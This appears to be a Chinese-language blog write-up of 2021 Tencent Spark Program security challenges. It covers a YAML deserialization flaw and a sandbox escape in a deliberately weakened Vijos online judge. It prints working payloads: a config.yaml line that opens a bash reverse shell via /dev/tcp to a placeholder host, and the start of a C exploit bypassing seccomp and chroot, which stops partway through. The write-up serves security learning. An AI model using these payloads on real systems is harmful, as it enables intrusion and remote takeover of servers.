<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="引言：如今，几乎所有的智能产品或多或少都离不开计算机的发展，计算机安全也渗入进生活的方方面面，大到网站Web服务器，小到手机App和家用路由器。挑战周的挑战项目由Web安全开始，逐渐向二进制安全，逆向安全推进。  声明：挑战周内使用的Web组件和评测机组件均来自开源OJ (Online Judge)组件：Vijos&#x2F;vj4, Vijos&#x2F;jd4。原组件经过多次迭代没有漏洞产生，">
<meta property="og:type" content="article">
<meta property="og:title" content="Tencent Spark Program 2021">
<meta property="og:url" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/index.html">
<meta property="og:site_name" content="Thomason&#39;s Blog">
<meta property="og:description" content="引言：如今，几乎所有的智能产品或多或少都离不开计算机的发展，计算机安全也渗入进生活的方方面面，大到网站Web服务器，小到手机App和家用路由器。挑战周的挑战项目由Web安全开始，逐渐向二进制安全，逆向安全推进。  声明：挑战周内使用的Web组件和评测机组件均来自开源OJ (Online Judge)组件：Vijos&#x2F;vj4, Vijos&#x2F;jd4。原组件经过多次迭代没有漏洞产生，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/20a77740fa52aabce522ac90e71e886.jpg">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/clip_image002.jpg">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813141927044.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813144701111.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819123040774.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819133532124.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124847550.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124754861.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819130843286.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813182738384.png">
<meta property="og:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/ARM_Calling_Convention.png">
<meta property="article:published_time" content="2021-08-19T15:38:00.000Z">
<meta property="article:modified_time" content="2022-08-09T23:02:04.944Z">
<meta property="article:author" content="Thomason Zhao">
<meta property="article:tag" content="Spark Program">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/assets/20a77740fa52aabce522ac90e71e886.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Tencent Spark Program 2021</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	

  <!-- fancybox support -->
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.css" />
  

<meta name="generator" content="Hexo 6.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ThomasonZhao">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2021/11/04/USTC-Hackgame-2021/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&text=Tencent Spark Program 2021"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&is_video=false&description=Tencent Spark Program 2021"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Tencent Spark Program 2021&body=Check out this article: https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&name=Tencent Spark Program 2021&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&t=Tencent Spark Program 2021"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Vijos-OJ%E8%AF%84%E6%B5%8B%E6%9C%BA%E4%B9%8Byaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.</span> <span class="toc-text">Vijos OJ评测机之yaml反序列化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vijos-OJ%E8%AF%84%E6%B5%8B%E6%9C%BA%E4%B9%8B%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="toc-number">2.</span> <span class="toc-text">Vijos OJ评测机之沙箱逃逸</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Docker%E9%80%83%E9%80%B8"><span class="toc-number">3.</span> <span class="toc-text">Docker逃逸</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%89%E5%8D%93Chrome%E6%BC%8F%E6%B4%9E%E5%AF%BC%E8%87%B4%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2"><span class="toc-number">4.</span> <span class="toc-text">安卓Chrome漏洞导致文件泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83%E7%94%A8%E6%88%B7Getshell"><span class="toc-number">5.</span> <span class="toc-text">路由器未授权用户Getshell</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Tencent Spark Program 2021
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Thomason Zhao</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-08-19T15:38:00.000Z" itemprop="datePublished">2021-08-19</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Project-Writeup/">Project Writeup</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Spark-Program/" rel="tag">Spark Program</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>引言：如今，几乎所有的智能产品或多或少都离不开计算机的发展，计算机安全也渗入进生活的方方面面，大到网站Web服务器，小到手机App和家用路由器。挑战周的挑战项目由Web安全开始，逐渐向二进制安全，逆向安全推进。</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/20a77740fa52aabce522ac90e71e886.jpg" data-caption="20a77740fa52aabce522ac90e71e886"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/20a77740fa52aabce522ac90e71e886.jpg" alt="20a77740fa52aabce522ac90e71e886"></a></p>
<p>声明：挑战周内使用的Web组件和评测机组件均来自开源OJ (Online Judge)组件：<a target="_blank" rel="noopener" href="https://github.com/vijos/vj4">Vijos&#x2F;vj4</a>, <a target="_blank" rel="noopener" href="https://github.com/vijos/jd4">Vijos&#x2F;jd4</a>。原组件经过多次迭代没有漏洞产生，导师通过修改jd4的源代码暴露漏洞供挑战周使用。漏洞复现所使用的安卓Chrome漏洞和路由器固件漏洞 (<a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2018-8879">CVE-2018-8879</a>) 厂商均已修复，请及时更新App或固件。</p>
<p>如对文档有任何疑问，请联系E-mail：<a href="mailto:&#84;&#104;&#111;&#109;&#97;&#115;&#x6f;&#x6e;&#90;&#x68;&#97;&#111;&#64;&#113;&#113;&#46;&#x63;&#111;&#109;">&#84;&#104;&#111;&#109;&#97;&#115;&#x6f;&#x6e;&#90;&#x68;&#97;&#111;&#64;&#113;&#113;&#46;&#x63;&#111;&#109;</a></p>
<h2 id="Vijos-OJ评测机之yaml反序列化"><a href="#Vijos-OJ评测机之yaml反序列化" class="headerlink" title="Vijos OJ评测机之yaml反序列化"></a>Vijos OJ评测机之yaml反序列化</h2><p>挑战背景：VIJOS是一个安全的OJ系统。这可能主要得益于开发者也是CTF选手。</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/clip_image002.jpg" data-caption="img"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/clip_image002.jpg" alt="img"></a></p>
<p>不过，并不是所有OJ的开发者都了解安全技术。本题目使用的VIJOS就是一个不懂安全的开发者开发的，他在开发过程中犯了一个很小安全错误，然而，这个安全错误却导致OJ被完全攻陷，你能找到这个安全错误，并利用它攻陷OJ吗？</p>
<p>代码审计：使用 <code>git stutus</code> 和 <code>git diff</code> 查看相关代码更改，发现只更改了一行代码，从使用 <code>safe_load()</code> 函数更改为 <code>load()</code>。</p>
<blockquote>
<p>  <code>yaml.load</code> accepts a byte string, a Unicode string, an open binary file object, or an open text file object. A byte string or a file must be encoded with <em>utf-8</em>, <em>utf-16-be</em> or <em>utf-16-le</em> encoding. <code>yaml.load</code> detects the encoding by checking the <em>BOM</em> (byte order mark) sequence at the beginning of the string&#x2F;file. If no <em>BOM</em> is present, the <em>utf-8</em> encoding is assumed.</p>
<p>  <code>yaml.load</code> returns a Python object.</p>
<p>  Note that the ability to construct an arbitrary Python object may be dangerous if you receive a YAML document from an untrusted source such as the Internet. The function <code>yaml.safe_load</code> limits this ability to simple Python objects like integers or lists.</p>
</blockquote>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813141927044.png" data-caption="image-20210813141927044"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813141927044.png" alt="image-20210813141927044"></a></p>
<p>漏洞详情：此处产生的是Pyyaml反序列化漏洞 (<a target="_blank" rel="noopener" href="https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/#:~:text=%5BCVE-2019-20477%5D-%200Day%20YAML%20Deserialization%20Attack%20on%20PyYAML%20version,...%206%20YAML%20Deserialization%207%20YAML%20Deserialization.%20">CVE-2019-20477</a>) 。根据反序列化原理编写payload，追加到作为测试数据的文件压缩包内。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> yaml</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Payload</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (os.system,(<span class="string">&#x27;ls&#x27;</span>,))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">serialized_data = yaml.dump(Payload())  <span class="comment"># serializing data</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(serialized_data)</span><br><span class="line">---------------------------------------</span><br><span class="line">!!python/<span class="built_in">object</span>/apply:nt.system [ls]</span><br></pre></td></tr></table></figure>

<p><code>config.yaml</code> payload文件：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">default:</span> <span class="meta">&amp;default</span></span><br><span class="line">  <span class="attr">time:</span> <span class="string">1s</span></span><br><span class="line">  <span class="attr">memory:</span> <span class="string">32m</span></span><br><span class="line">  <span class="attr">score:</span> <span class="number">10</span></span><br><span class="line"><span class="attr">cases:</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case0.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case0.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case1.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case1.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case2.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case2.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case3.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case3.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case4.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case4.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case5.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case5.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case6.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case6.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case7.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case7.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case8.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case8.out</span></span><br><span class="line"><span class="bullet">-</span> <span class="string">&lt;&lt;:</span> <span class="meta">*default</span></span><br><span class="line">  <span class="attr">input:</span> <span class="string">case9.in</span></span><br><span class="line">  <span class="attr">output:</span> <span class="string">case9.out</span></span><br><span class="line"></span><br><span class="line"><span class="attr">m:</span> <span class="type">!!python/object/new:os.system</span> [<span class="string">&quot;/bin/bash -c &#x27;/bin/bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1&#x27;&quot;</span>]</span><br></pre></td></tr></table></figure>

<p>通过在Vijos账号中创建自己的域并创建自己的题目，上传修改yaml文件后的测试文件压缩包，随意运行程序即可反弹Shell。拿到Docker下的root权限。</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813144701111.png" data-caption="image-20210813144701111"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813144701111.png" alt="image-20210813144701111"></a></p>
<h2 id="Vijos-OJ评测机之沙箱逃逸"><a href="#Vijos-OJ评测机之沙箱逃逸" class="headerlink" title="Vijos OJ评测机之沙箱逃逸"></a>Vijos OJ评测机之沙箱逃逸</h2><p>题目背景：经过上次的Vijos逃逸事件之后，不懂安全的开发者修补了上次漏洞。并痛定思痛决定开始学习安全技术。在学习了安全技术之后，他认为VIJOS的沙箱允许选手在提交的代码中执行任意的系统调用是非常危险的行为，所以他决定对其进行限制，然而，在这个过程中，他又犯了一些错误，这些错误可以导致评测机被攻陷，你能找到这些错误，并利用它们攻陷评测机吗？</p>
<p>代码审计：同样的，使用 <code>git stutus</code> 和 <code>git diff</code> 查看相关代码更改。（不过开发者好像并没有修复第一个漏洞嘿嘿）主要更改就是重写了原有的沙箱机制，使用 <code>chroot </code>和 <code>LD_PRELOAD </code>指定 <code>scf.so</code> 文件制定沙箱</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819123040774.png" data-caption="image-20210819123040774"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819123040774.png" alt="image-20210819123040774"></a></p>
<p>漏洞详情：评测机使用的沙箱依然是建立在docker容器中，在 <code>/tmp</code> 目录下创建沙箱使用的文件夹，并使用 <code>chroot</code> 使每一个沙箱都具有和评测机容器内一样的环境（只不过是假的root）。新引用的 <code>scf.so</code> 文件重写了所提交代码的 <code>main</code> 函数，通过 <code>LD_PRELOAD</code> 强行绑定 <code>seccomp</code> 组件限制程序使用不当的系统调用（syscall），例如直接写入文档或者执行恶意代码。</p>
<blockquote>
<p>  A <strong>chroot</strong> on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally cannot access) files outside the designated directory tree. The term “chroot” may refer to the chroot(2) system call or the chroot(8) wrapper program. The modified environment is called a chroot jail.</p>
<p>  <strong>seccomp</strong> (short for <strong>secure computing mode</strong>) is a computer security facility in the Linux kernel. seccomp allows a process to make a one-way transition into a “secure” state where it cannot make any system call except <code>exit()</code>, <code>sigreturn()</code>, <code>read()</code> and <code>write()</code> to already-open file descriptors. Should it attempt any other system calls, the kernel will terminate the process with SIGKILL or SIGSYS。 In this sense, it does not virtualize the system’s resources but isolates the process from them entirely.</p>
</blockquote>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819133532124.png" data-caption="image-20210819133532124"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819133532124.png" alt="image-20210819133532124"></a></p>
<p>通过IDA逆向所引用的 <code>scf.so</code> 文件，其只禁用了x86和x64下的系统调用，并未检查 x32 ABI的系统调用，因此使用x32的系统调用即可绕过 <code>sccomp</code> 的检测。因此，所有参数传参（例如所执行的命令，变量等），地址都需要手动指定为32位地址。</p>
<blockquote>
<p>  x32 is a new ABI being actively worked on. It is basically 32-bit code running in x86_64 (x64) mode on the CPU so that it has access to the additional 8 registers to boost program speed while remaining memory efficient via the use of 32-bit pointers. See <a target="_blank" rel="noopener" href="https://sites.google.com/site/x32abi/">sites.google.com&#x2F;site&#x2F;x32abi</a> and <a target="_blank" rel="noopener" href="http://lwn.net/Articles/456731/">lwn.net&#x2F;Articles&#x2F;456731</a>. – <a target="_blank" rel="noopener" href="https://stackoverflow.com/users/1163142/gps">gps</a></p>
</blockquote>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124847550.png" data-caption="image-20210819124847550"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124847550.png" alt="image-20210819124847550"></a></p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124754861.png" data-caption="image-20210819124754861"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819124754861.png" alt="image-20210819124754861"></a></p>
<p>逃逸 <code>chroot</code> 则相对来讲比较简单，在沙箱内得到RCE (Remote Code Execution) 权限后，向当前沙箱根目录下创建任意临时文件夹 <code>abc</code>，进入此文件夹下执行 <code>chroot</code> 命令，此时 <code>abc</code> 文件夹变成了根目录。然后多次执行更改当前工作目录为上级文件夹直到到达真正的根目录。此时再次执行 <code>chroot</code> 命令，则当前目录为容器根目录。</p>
<blockquote>
<ul>
<li><p>Create a temporary directory in its current working directory</p>
</li>
<li><p>Open the current working directory</p>
<p>​	Note: only required if chroot() changes the calling program’s working directory.</p>
</li>
<li><p>Change the root directory of the process to the temporary directory using chroot().</p>
</li>
<li><p>Use fchdir() with the file descriptor of the opened directory to move the current working directory outside the chroot()ed area.</p>
<p>​	Note: only required if chroot() changes the calling program’s working directory.</p>
</li>
<li><pre><code>Perform chdir(&quot;..&quot;) calls many times to move the current working directory into the real root directory.
</code></pre>
<ul>
<li><pre><code>Change the root directory of the process to the current working directory, the real root directory, using chroot(&quot;.&quot;)
</code></pre>
</li>
</ul>
</li>
</ul>
</blockquote>
<p>则最终攻击思路为：先绕过 <code>sccomp</code> 并跳出 <code>chroot</code> 在容器中通过执行任意代码删除所引用的 <code>/lib64/scf.so</code> 文件解除 <code>seccomp</code> 的syscall限制，再次上传第二段代码直接执行反弹shell指令，拿到容器shell。</p>
<p>EXP文件如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// first time code</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;signal.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stddef.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ptrace.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/user.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/prctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/seccomp.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/filter.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/audit.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">change_root</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  chdir(<span class="string">&quot;/&quot;</span>);</span><br><span class="line">  mkdir(<span class="string">&quot;abc&quot;</span>, <span 